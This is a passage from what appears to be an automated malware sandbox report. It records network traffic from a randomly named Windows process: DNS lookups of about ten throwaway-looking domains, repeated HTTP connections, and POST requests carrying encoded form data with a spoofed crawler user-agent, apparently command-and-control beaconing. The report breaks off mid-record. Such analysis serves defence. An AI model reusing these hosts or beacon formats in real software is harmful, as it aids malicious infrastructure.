Jan 11, 2025 01:56:01.746089935 CET	80	49986	46.38.243.234	192.168.2.7
Jan 11, 2025 01:56:03.250833035 CET	49986	80	192.168.2.7	46.38.243.234
Jan 11, 2025 01:56:03.256130934 CET	80	49986	46.38.243.234	192.168.2.7
Jan 11, 2025 01:56:03.256217003 CET	49986	80	192.168.2.7	46.38.243.234
Jan 11, 2025 01:56:04.257837057 CET	49987	80	192.168.2.7	46.38.243.234
Jan 11, 2025 01:56:04.262736082 CET	80	49987	46.38.243.234	192.168.2.7
Jan 11, 2025 01:56:04.262830973 CET	49987	80	192.168.2.7	46.38.243.234
Jan 11, 2025 01:56:04.283231974 CET	49987	80	192.168.2.7	46.38.243.234
Jan 11, 2025 01:56:04.288108110 CET	80	49987	46.38.243.234	192.168.2.7
Jan 11, 2025 01:56:05.799417019 CET	49987	80	192.168.2.7	46.38.243.234
Jan 11, 2025 01:56:05.804606915 CET	80	49987	46.38.243.234	192.168.2.7
Jan 11, 2025 01:56:05.804673910 CET	49987	80	192.168.2.7	46.38.243.234
Jan 11, 2025 01:56:06.831511021 CET	49988	80	192.168.2.7	46.38.243.234
Jan 11, 2025 01:56:06.836395979 CET	80	49988	46.38.243.234	192.168.2.7
Jan 11, 2025 01:56:06.840214014 CET	49988	80	192.168.2.7	46.38.243.234
Jan 11, 2025 01:56:06.854203939 CET	49988	80	192.168.2.7	46.38.243.234
Jan 11, 2025 01:56:06.859011889 CET	80	49988	46.38.243.234	192.168.2.7
Jan 11, 2025 01:56:06.859280109 CET	80	49988	46.38.243.234	192.168.2.7
Jan 11, 2025 01:56:08.360220909 CET	49988	80	192.168.2.7	46.38.243.234
Jan 11, 2025 01:56:08.365309954 CET	80	49988	46.38.243.234	192.168.2.7
Jan 11, 2025 01:56:08.365385056 CET	49988	80	192.168.2.7	46.38.243.234
Jan 11, 2025 01:56:09.380112886 CET	49989	80	192.168.2.7	46.38.243.234
Jan 11, 2025 01:56:09.385018110 CET	80	49989	46.38.243.234	192.168.2.7
Jan 11, 2025 01:56:09.385129929 CET	49989	80	192.168.2.7	46.38.243.234
Jan 11, 2025 01:56:09.397954941 CET	49989	80	192.168.2.7	46.38.243.234
Jan 11, 2025 01:56:09.402853966 CET	80	49989	46.38.243.234	192.168.2.7
Jan 11, 2025 01:56:11.324201107 CET	80	49989	46.38.243.234	192.168.2.7
Jan 11, 2025 01:56:11.324314117 CET	80	49989	46.38.243.234	192.168.2.7
Jan 11, 2025 01:56:11.324500084 CET	49989	80	192.168.2.7	46.38.243.234
Jan 11, 2025 01:56:11.327115059 CET	49989	80	192.168.2.7	46.38.243.234
Jan 11, 2025 01:56:11.331866026 CET	80	49989	46.38.243.234	192.168.2.7
Jan 11, 2025 01:56:16.346828938 CET	49990	80	192.168.2.7	188.114.96.3
Jan 11, 2025 01:56:16.351741076 CET	80	49990	188.114.96.3	192.168.2.7
Jan 11, 2025 01:56:16.351885080 CET	49990	80	192.168.2.7	188.114.96.3
Jan 11, 2025 01:56:16.376620054 CET	49990	80	192.168.2.7	188.114.96.3
Jan 11, 2025 01:56:16.381464958 CET	80	49990	188.114.96.3	192.168.2.7
Jan 11, 2025 01:56:17.568973064 CET	80	49990	188.114.96.3	192.168.2.7
Jan 11, 2025 01:56:17.568995953 CET	80	49990	188.114.96.3	192.168.2.7
Jan 11, 2025 01:56:17.569102049 CET	49990	80	192.168.2.7	188.114.96.3
Jan 11, 2025 01:56:17.569361925 CET	80	49990	188.114.96.3	192.168.2.7
Jan 11, 2025 01:56:17.569434881 CET	49990	80	192.168.2.7	188.114.96.3
Jan 11, 2025 01:56:17.891421080 CET	49990	80	192.168.2.7	188.114.96.3
Jan 11, 2025 01:56:18.932493925 CET	49991	80	192.168.2.7	188.114.96.3
Jan 11, 2025 01:56:18.937551975 CET	80	49991	188.114.96.3	192.168.2.7
Jan 11, 2025 01:56:18.937640905 CET	49991	80	192.168.2.7	188.114.96.3
Jan 11, 2025 01:56:19.054090977 CET	49991	80	192.168.2.7	188.114.96.3
Jan 11, 2025 01:56:19.059093952 CET	80	49991	188.114.96.3	192.168.2.7
Jan 11, 2025 01:56:20.085652113 CET	80	49991	188.114.96.3	192.168.2.7
Jan 11, 2025 01:56:20.085679054 CET	80	49991	188.114.96.3	192.168.2.7
Jan 11, 2025 01:56:20.085731030 CET	49991	80	192.168.2.7	188.114.96.3
Jan 11, 2025 01:56:20.086725950 CET	80	49991	188.114.96.3	192.168.2.7
Jan 11, 2025 01:56:20.086780071 CET	49991	80	192.168.2.7	188.114.96.3
Jan 11, 2025 01:56:20.563642025 CET	49991	80	192.168.2.7	188.114.96.3
Jan 11, 2025 01:56:21.610615969 CET	49992	80	192.168.2.7	188.114.96.3
Jan 11, 2025 01:56:21.615495920 CET	80	49992	188.114.96.3	192.168.2.7
Jan 11, 2025 01:56:21.615648031 CET	49992	80	192.168.2.7	188.114.96.3
Jan 11, 2025 01:56:21.732812881 CET	49992	80	192.168.2.7	188.114.96.3
Jan 11, 2025 01:56:21.737739086 CET	80	49992	188.114.96.3	192.168.2.7
Jan 11, 2025 01:56:21.737766981 CET	80	49992	188.114.96.3	192.168.2.7
Jan 11, 2025 01:56:22.805789948 CET	80	49992	188.114.96.3	192.168.2.7
Jan 11, 2025 01:56:22.805811882 CET	80	49992	188.114.96.3	192.168.2.7
Jan 11, 2025 01:56:22.805907011 CET	49992	80	192.168.2.7	188.114.96.3
Jan 11, 2025 01:56:22.806540012 CET	80	49992	188.114.96.3	192.168.2.7
Jan 11, 2025 01:56:22.806613922 CET	49992	80	192.168.2.7	188.114.96.3
Jan 11, 2025 01:56:23.251075029 CET	49992	80	192.168.2.7	188.114.96.3
Jan 11, 2025 01:56:24.270266056 CET	49993	80	192.168.2.7	188.114.96.3
Jan 11, 2025 01:56:24.275204897 CET	80	49993	188.114.96.3	192.168.2.7
Jan 11, 2025 01:56:24.275306940 CET	49993	80	192.168.2.7	188.114.96.3
Jan 11, 2025 01:56:24.283943892 CET	49993	80	192.168.2.7	188.114.96.3
Jan 11, 2025 01:56:24.288729906 CET	80	49993	188.114.96.3	192.168.2.7
Jan 11, 2025 01:56:25.422071934 CET	80	49993	188.114.96.3	192.168.2.7
Jan 11, 2025 01:56:25.422144890 CET	80	49993	188.114.96.3	192.168.2.7
Jan 11, 2025 01:56:25.422276020 CET	49993	80	192.168.2.7	188.114.96.3
Jan 11, 2025 01:56:25.422467947 CET	80	49993	188.114.96.3	192.168.2.7
Jan 11, 2025 01:56:25.422528982 CET	49993	80	192.168.2.7	188.114.96.3
Jan 11, 2025 01:56:25.426665068 CET	49993	80	192.168.2.7	188.114.96.3
Jan 11, 2025 01:56:25.431490898 CET	80	49993	188.114.96.3	192.168.2.7
Jan 11, 2025 01:56:38.651704073 CET	49994	80	192.168.2.7	18.163.74.139
Jan 11, 2025 01:56:38.656563044 CET	80	49994	18.163.74.139	192.168.2.7
Jan 11, 2025 01:56:38.656625032 CET	49994	80	192.168.2.7	18.163.74.139
Jan 11, 2025 01:56:38.778493881 CET	49994	80	192.168.2.7	18.163.74.139
Jan 11, 2025 01:56:38.783406019 CET	80	49994	18.163.74.139	192.168.2.7
Jan 11, 2025 01:56:39.580712080 CET	80	49994	18.163.74.139	192.168.2.7
Jan 11, 2025 01:56:39.580815077 CET	80	49994	18.163.74.139	192.168.2.7
Jan 11, 2025 01:56:39.580905914 CET	49994	80	192.168.2.7	18.163.74.139
Jan 11, 2025 01:56:40.282118082 CET	49994	80	192.168.2.7	18.163.74.139
Jan 11, 2025 01:56:41.300914049 CET	49995	80	192.168.2.7	18.163.74.139
Jan 11, 2025 01:56:41.305780888 CET	80	49995	18.163.74.139	192.168.2.7
Jan 11, 2025 01:56:41.305871010 CET	49995	80	192.168.2.7	18.163.74.139
Jan 11, 2025 01:56:41.319992065 CET	49995	80	192.168.2.7	18.163.74.139
Jan 11, 2025 01:56:41.324786901 CET	80	49995	18.163.74.139	192.168.2.7
Jan 11, 2025 01:56:42.253429890 CET	80	49995	18.163.74.139	192.168.2.7
Jan 11, 2025 01:56:42.253505945 CET	80	49995	18.163.74.139	192.168.2.7
Jan 11, 2025 01:56:42.253554106 CET	49995	80	192.168.2.7	18.163.74.139
Jan 11, 2025 01:56:42.828984022 CET	49995	80	192.168.2.7	18.163.74.139
Jan 11, 2025 01:56:43.847337961 CET	49996	80	192.168.2.7	18.163.74.139
Jan 11, 2025 01:56:43.852240086 CET	80	49996	18.163.74.139	192.168.2.7
Jan 11, 2025 01:56:43.852344036 CET	49996	80	192.168.2.7	18.163.74.139
Jan 11, 2025 01:56:43.865787029 CET	49996	80	192.168.2.7	18.163.74.139
Jan 11, 2025 01:56:43.870621920 CET	80	49996	18.163.74.139	192.168.2.7
Jan 11, 2025 01:56:43.870631933 CET	80	49996	18.163.74.139	192.168.2.7
Jan 11, 2025 01:56:44.783360958 CET	80	49996	18.163.74.139	192.168.2.7
Jan 11, 2025 01:56:44.783473969 CET	80	49996	18.163.74.139	192.168.2.7
Jan 11, 2025 01:56:44.783541918 CET	49996	80	192.168.2.7	18.163.74.139
Jan 11, 2025 01:56:45.375833035 CET	49996	80	192.168.2.7	18.163.74.139
Jan 11, 2025 01:56:46.394457102 CET	49997	80	192.168.2.7	18.163.74.139
Jan 11, 2025 01:56:46.399327993 CET	80	49997	18.163.74.139	192.168.2.7
Jan 11, 2025 01:56:46.399441957 CET	49997	80	192.168.2.7	18.163.74.139
Jan 11, 2025 01:56:46.407867908 CET	49997	80	192.168.2.7	18.163.74.139
Jan 11, 2025 01:56:46.412873030 CET	80	49997	18.163.74.139	192.168.2.7
Jan 11, 2025 01:56:47.343079090 CET	80	49997	18.163.74.139	192.168.2.7
Jan 11, 2025 01:56:47.343099117 CET	80	49997	18.163.74.139	192.168.2.7
Jan 11, 2025 01:56:47.343332052 CET	49997	80	192.168.2.7	18.163.74.139
Jan 11, 2025 01:56:47.346220016 CET	49997	80	192.168.2.7	18.163.74.139
Jan 11, 2025 01:56:47.351022005 CET	80	49997	18.163.74.139	192.168.2.7
Jan 11, 2025 01:56:52.861319065 CET	49998	80	192.168.2.7	162.218.30.235
Jan 11, 2025 01:56:52.866197109 CET	80	49998	162.218.30.235	192.168.2.7
Jan 11, 2025 01:56:52.866288900 CET	49998	80	192.168.2.7	162.218.30.235
Jan 11, 2025 01:56:52.918998003 CET	49998	80	192.168.2.7	162.218.30.235
Jan 11, 2025 01:56:52.923826933 CET	80	49998	162.218.30.235	192.168.2.7
Jan 11, 2025 01:56:53.446706057 CET	80	49998	162.218.30.235	192.168.2.7
Jan 11, 2025 01:56:53.446789026 CET	80	49998	162.218.30.235	192.168.2.7
Jan 11, 2025 01:56:53.446861029 CET	49998	80	192.168.2.7	162.218.30.235
Jan 11, 2025 01:56:54.422744989 CET	49998	80	192.168.2.7	162.218.30.235
Jan 11, 2025 01:56:55.441610098 CET	49999	80	192.168.2.7	162.218.30.235
Jan 11, 2025 01:56:55.446432114 CET	80	49999	162.218.30.235	192.168.2.7
Jan 11, 2025 01:56:55.446515083 CET	49999	80	192.168.2.7	162.218.30.235
Jan 11, 2025 01:56:55.462291002 CET	49999	80	192.168.2.7	162.218.30.235
Jan 11, 2025 01:56:55.467081070 CET	80	49999	162.218.30.235	192.168.2.7
Jan 11, 2025 01:56:56.038284063 CET	80	49999	162.218.30.235	192.168.2.7
Jan 11, 2025 01:56:56.038552046 CET	80	49999	162.218.30.235	192.168.2.7
Jan 11, 2025 01:56:56.038707018 CET	49999	80	192.168.2.7	162.218.30.235
Jan 11, 2025 01:56:56.969674110 CET	49999	80	192.168.2.7	162.218.30.235
Jan 11, 2025 01:56:57.988420963 CET	50000	80	192.168.2.7	162.218.30.235
Jan 11, 2025 01:56:57.993424892 CET	80	50000	162.218.30.235	192.168.2.7
Jan 11, 2025 01:56:57.993557930 CET	50000	80	192.168.2.7	162.218.30.235
Jan 11, 2025 01:56:58.007899046 CET	50000	80	192.168.2.7	162.218.30.235
Jan 11, 2025 01:56:58.012696028 CET	80	50000	162.218.30.235	192.168.2.7
Jan 11, 2025 01:56:58.012794018 CET	80	50000	162.218.30.235	192.168.2.7
Jan 11, 2025 01:56:58.590877056 CET	80	50000	162.218.30.235	192.168.2.7
Jan 11, 2025 01:56:58.591032028 CET	80	50000	162.218.30.235	192.168.2.7
Jan 11, 2025 01:56:58.591231108 CET	50000	80	192.168.2.7	162.218.30.235
Jan 11, 2025 01:56:59.516634941 CET	50000	80	192.168.2.7	162.218.30.235
Jan 11, 2025 01:57:00.535159111 CET	50001	80	192.168.2.7	162.218.30.235
Jan 11, 2025 01:57:00.540324926 CET	80	50001	162.218.30.235	192.168.2.7
Jan 11, 2025 01:57:00.540460110 CET	50001	80	192.168.2.7	162.218.30.235
Jan 11, 2025 01:57:00.549356937 CET	50001	80	192.168.2.7	162.218.30.235
Jan 11, 2025 01:57:00.554286003 CET	80	50001	162.218.30.235	192.168.2.7
Jan 11, 2025 01:57:01.108649015 CET	80	50001	162.218.30.235	192.168.2.7
Jan 11, 2025 01:57:01.108794928 CET	80	50001	162.218.30.235	192.168.2.7
Jan 11, 2025 01:57:01.108849049 CET	50001	80	192.168.2.7	162.218.30.235
Jan 11, 2025 01:57:01.111391068 CET	50001	80	192.168.2.7	162.218.30.235
Jan 11, 2025 01:57:01.116148949 CET	80	50001	162.218.30.235	192.168.2.7
Jan 11, 2025 01:57:06.477662086 CET	50002	80	192.168.2.7	192.186.58.31
Jan 11, 2025 01:57:06.482465029 CET	80	50002	192.186.58.31	192.168.2.7
Jan 11, 2025 01:57:06.484185934 CET	50002	80	192.168.2.7	192.186.58.31
Jan 11, 2025 01:57:06.498294115 CET	50002	80	192.168.2.7	192.186.58.31
Jan 11, 2025 01:57:06.503128052 CET	80	50002	192.186.58.31	192.168.2.7
Jan 11, 2025 01:57:07.417762041 CET	80	50002	192.186.58.31	192.168.2.7
Jan 11, 2025 01:57:07.417803049 CET	80	50002	192.186.58.31	192.168.2.7
Jan 11, 2025 01:57:07.417850018 CET	50002	80	192.168.2.7	192.186.58.31
Jan 11, 2025 01:57:08.485274076 CET	50002	80	192.168.2.7	192.186.58.31

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 01:54:50.275544882 CET	50891	53	192.168.2.7	1.1.1.1
Jan 11, 2025 01:54:50.292251110 CET	53	50891	1.1.1.1	192.168.2.7
Jan 11, 2025 01:55:06.988760948 CET	53391	53	192.168.2.7	1.1.1.1
Jan 11, 2025 01:55:07.011693954 CET	53	53391	1.1.1.1	192.168.2.7
Jan 11, 2025 01:55:21.286220074 CET	52758	53	192.168.2.7	1.1.1.1
Jan 11, 2025 01:55:21.338102102 CET	53	52758	1.1.1.1	192.168.2.7
Jan 11, 2025 01:55:34.785757065 CET	62920	53	192.168.2.7	1.1.1.1
Jan 11, 2025 01:55:34.893202066 CET	53	62920	1.1.1.1	192.168.2.7
Jan 11, 2025 01:55:48.382005930 CET	56117	53	192.168.2.7	1.1.1.1
Jan 11, 2025 01:55:48.397232056 CET	53	56117	1.1.1.1	192.168.2.7
Jan 11, 2025 01:56:01.677438021 CET	50754	53	192.168.2.7	1.1.1.1
Jan 11, 2025 01:56:01.714538097 CET	53	50754	1.1.1.1	192.168.2.7
Jan 11, 2025 01:56:16.332715034 CET	64834	53	192.168.2.7	1.1.1.1
Jan 11, 2025 01:56:16.344290972 CET	53	64834	1.1.1.1	192.168.2.7
Jan 11, 2025 01:56:30.444533110 CET	50437	53	192.168.2.7	1.1.1.1
Jan 11, 2025 01:56:30.496962070 CET	53	50437	1.1.1.1	192.168.2.7
Jan 11, 2025 01:56:38.600110054 CET	61933	53	192.168.2.7	1.1.1.1
Jan 11, 2025 01:56:38.633058071 CET	53	61933	1.1.1.1	192.168.2.7
Jan 11, 2025 01:56:52.364609003 CET	63004	53	192.168.2.7	1.1.1.1
Jan 11, 2025 01:56:52.852598906 CET	53	63004	1.1.1.1	192.168.2.7
Jan 11, 2025 01:57:06.129515886 CET	53227	53	192.168.2.7	1.1.1.1
Jan 11, 2025 01:57:06.472685099 CET	53	53227	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 01:54:50.275544882 CET	192.168.2.7	1.1.1.1	0x8859	Standard query (0)	www.aoivej.info	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:55:06.988760948 CET	192.168.2.7	1.1.1.1	0x9382	Standard query (0)	www.givvjn.info	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:55:21.286220074 CET	192.168.2.7	1.1.1.1	0xcb41	Standard query (0)	www.gern.dev	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:55:34.785757065 CET	192.168.2.7	1.1.1.1	0x25fa	Standard query (0)	www.newbh.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:55:48.382005930 CET	192.168.2.7	1.1.1.1	0x14c4	Standard query (0)	www.thinkone.xyz	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:56:01.677438021 CET	192.168.2.7	1.1.1.1	0x83a5	Standard query (0)	www.mraber.dev	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:56:16.332715034 CET	192.168.2.7	1.1.1.1	0xbac4	Standard query (0)	www.einpisalpace.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:56:30.444533110 CET	192.168.2.7	1.1.1.1	0xc381	Standard query (0)	www.multichaindapps.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:56:38.600110054 CET	192.168.2.7	1.1.1.1	0xdea3	Standard query (0)	www.fzmmkj.shop	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:56:52.364609003 CET	192.168.2.7	1.1.1.1	0x282e	Standard query (0)	www.l03678.xyz	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:57:06.129515886 CET	192.168.2.7	1.1.1.1	0x4776	Standard query (0)	www.aihuzhibo.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 01:54:50.292251110 CET	1.1.1.1	192.168.2.7	0x8859	No error (0)	www.aoivej.info		47.83.1.90	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:55:07.011693954 CET	1.1.1.1	192.168.2.7	0x9382	No error (0)	www.givvjn.info		47.83.1.90	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:55:21.338102102 CET	1.1.1.1	192.168.2.7	0xcb41	No error (0)	www.gern.dev		185.151.30.223	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:55:34.893202066 CET	1.1.1.1	192.168.2.7	0x25fa	No error (0)	www.newbh.pro		176.57.65.76	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:55:48.397232056 CET	1.1.1.1	192.168.2.7	0x14c4	No error (0)	www.thinkone.xyz		209.74.79.41	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:56:01.714538097 CET	1.1.1.1	192.168.2.7	0x83a5	No error (0)	www.mraber.dev	mraber.dev		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 01:56:01.714538097 CET	1.1.1.1	192.168.2.7	0x83a5	No error (0)	mraber.dev		46.38.243.234	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:56:16.344290972 CET	1.1.1.1	192.168.2.7	0xbac4	No error (0)	www.einpisalpace.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:56:16.344290972 CET	1.1.1.1	192.168.2.7	0xbac4	No error (0)	www.einpisalpace.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:56:30.496962070 CET	1.1.1.1	192.168.2.7	0xc381	No error (0)	www.multichaindapps.pro	multichaindapps.pro		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 01:56:38.633058071 CET	1.1.1.1	192.168.2.7	0xdea3	No error (0)	www.fzmmkj.shop		18.163.74.139	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:56:52.852598906 CET	1.1.1.1	192.168.2.7	0x282e	No error (0)	www.l03678.xyz		162.218.30.235	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:57:06.472685099 CET	1.1.1.1	192.168.2.7	0x4776	No error (0)	www.aihuzhibo.net		192.186.58.31	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.aoivej.info

www.givvjn.info

www.gern.dev

www.newbh.pro

www.thinkone.xyz

www.mraber.dev

www.einpisalpace.shop

www.fzmmkj.shop

www.l03678.xyz

www.aihuzhibo.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49949	47.83.1.90	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:54:50.322220087 CET	426	OUT	GET /ou8k/?wtE0B=1LjxZz&9F=sHhXhPPev91RFxpiABH++MCfuMPpFFZ8Fxcd9dT6JE90JPwt9aU6w+ea6SVS8TAmTGQcFcEZTyl6CSjd+TmO0sI7dzm7yirMvYOFPgxKsvpHXbsFCpq0n5Sy3gZxoaEsqIw5Xzm0kuoI HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Host: www.aoivej.info Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Jan 11, 2025 01:54:51.949440002 CET	139	IN	HTTP/1.1 567 unknown Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 00:54:51 GMT Content-Length: 17 Connection: close Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65 Data Ascii: Request too large

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49969	47.83.1.90	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:55:07.034873009 CET	683	OUT	POST /wl3x/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.givvjn.info Origin: http://www.givvjn.info Referer: http://www.givvjn.info/wl3x/ Content-Length: 215 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 39 46 3d 46 42 76 66 76 45 6f 4d 74 59 61 4b 6f 66 39 4c 69 42 69 6d 6f 47 78 51 35 76 54 6b 46 74 51 5a 50 53 51 6e 67 74 74 4d 65 51 68 72 4d 4d 66 6c 50 58 67 79 6d 50 69 52 44 6c 52 70 47 75 35 68 52 2b 48 41 38 64 76 71 33 55 32 54 5a 6f 45 76 75 32 61 4b 2b 72 31 50 79 34 55 4e 7a 64 41 70 4b 71 6d 76 4a 73 41 55 4d 76 42 6f 61 70 34 77 75 72 59 58 4b 53 7a 69 74 59 79 73 48 73 4c 45 77 52 36 41 64 51 73 6b 50 31 4c 65 6f 50 67 67 34 47 31 77 49 64 69 47 63 6a 7a 4f 36 49 78 6e 4e 64 6e 75 47 77 30 4a 2f 47 65 6a 35 59 69 66 48 6a 73 42 47 48 67 36 77 41 6f 31 52 6c 54 57 2f 37 49 54 64 43 6d 51 58 49 67 6e 5a 75 36 4e 73 41 3d 3d Data Ascii: 9F=FBvfvEoMtYaKof9LiBimoGxQ5vTkFtQZPSQngttMeQhrMMflPXgymPiRDlRpGu5hR+HA8dvq3U2TZoEvu2aK+r1Py4UNzdApKqmvJsAUMvBoap4wurYXKSzitYysHsLEwR6AdQskP1LeoPgg4G1wIdiGcjzO6IxnNdnuGw0J/Gej5YifHjsBGHg6wAo1RlTW/7ITdCmQXIgnZu6NsA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49970	47.83.1.90	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:55:09.592060089 CET	703	OUT	POST /wl3x/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.givvjn.info Origin: http://www.givvjn.info Referer: http://www.givvjn.info/wl3x/ Content-Length: 235 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 39 46 3d 46 42 76 66 76 45 6f 4d 74 59 61 4b 70 37 35 4c 6b 6e 71 6d 67 47 78 54 33 50 54 6b 63 64 51 56 50 53 63 6e 67 70 31 63 64 69 31 72 4a 65 58 6c 4f 57 67 79 6c 50 69 52 4a 46 52 73 62 2b 35 71 52 2b 4c 69 38 66 72 71 33 56 53 54 5a 6f 55 76 75 46 79 4a 76 72 31 4a 37 59 55 31 73 4e 41 70 4b 71 6d 76 4a 73 6b 2b 4d 75 70 6f 61 5a 49 77 76 4b 59 57 4a 53 7a 68 6c 34 79 73 4e 4d 4b 44 77 52 36 69 64 53 49 65 50 32 7a 65 6f 4f 51 67 34 55 4e 76 43 64 69 49 53 44 79 64 70 61 51 58 4e 63 7a 56 43 6d 73 36 38 55 65 55 78 4f 6a 39 64 42 67 74 59 57 59 42 30 43 4d 44 47 44 4f 6a 39 36 4d 4c 51 67 53 78 49 2f 46 4e 55 38 62 4a 36 30 34 55 39 4b 2f 79 46 55 44 4e 31 65 49 76 4c 6e 2b 55 62 59 4d 3d Data Ascii: 9F=FBvfvEoMtYaKp75LknqmgGxT3PTkcdQVPScngp1cdi1rJeXlOWgylPiRJFRsb+5qR+Li8frq3VSTZoUvuFyJvr1J7YU1sNApKqmvJsk+MupoaZIwvKYWJSzhl4ysNMKDwR6idSIeP2zeoOQg4UNvCdiISDydpaQXNczVCms68UeUxOj9dBgtYWYB0CMDGDOj96MLQgSxI/FNU8bJ604U9K/yFUDN1eIvLn+UbYM=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49971	47.83.1.90	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:55:12.135459900 CET	1716	OUT	POST /wl3x/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.givvjn.info Origin: http://www.givvjn.info Referer: http://www.givvjn.info/wl3x/ Content-Length: 1247 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 39 46 3d 46 42 76 66 76 45 6f 4d 74 59 61 4b 70 37 35 4c 6b 6e 71 6d 67 47 78 54 33 50 54 6b 63 64 51 56 50 53 63 6e 67 70 31 63 64 69 74 72 4a 4c 62 6c 50 31 59 79 6b 50 69 52 46 6c 52 74 62 2b 35 33 52 39 37 6d 38 66 6e 55 33 57 36 54 5a 4c 73 76 6f 30 79 4a 32 37 31 4a 6b 49 55 4f 7a 64 42 7a 4b 71 32 72 4a 73 30 2b 4d 75 70 6f 61 62 67 77 35 72 59 57 45 79 7a 69 74 59 7a 74 48 73 4b 6e 77 52 6a 56 64 53 4d 4f 54 58 54 65 78 75 41 67 30 42 5a 76 66 4e 69 4b 56 44 7a 61 70 61 63 49 4e 59 62 7a 43 6d 77 44 38 55 57 55 69 35 37 6a 59 44 55 78 42 6e 70 65 32 41 49 65 4a 67 69 57 79 4b 39 38 50 54 36 6b 4a 4e 70 53 4d 71 37 76 7a 44 6c 44 6c 5a 76 52 4e 31 76 4f 30 49 68 45 57 32 71 4b 50 49 4c 79 4c 36 71 44 57 79 54 51 49 66 57 32 62 4f 72 62 4b 50 73 70 50 4f 54 74 67 41 66 66 32 66 53 71 49 62 58 6c 52 62 4c 65 48 36 6c 4c 49 78 58 69 6b 69 75 4b 54 77 6a 4a 6e 39 6b 61 74 59 4c 7a 42 74 4b 69 7a 53 2b 50 75 43 72 44 51 75 31 34 4b 31 68 33 69 4a 71 51 38 77 47 74 66 4b 4a 36 36 6f 6c 6d 33 46 54 [TRUNCATED] Data Ascii: 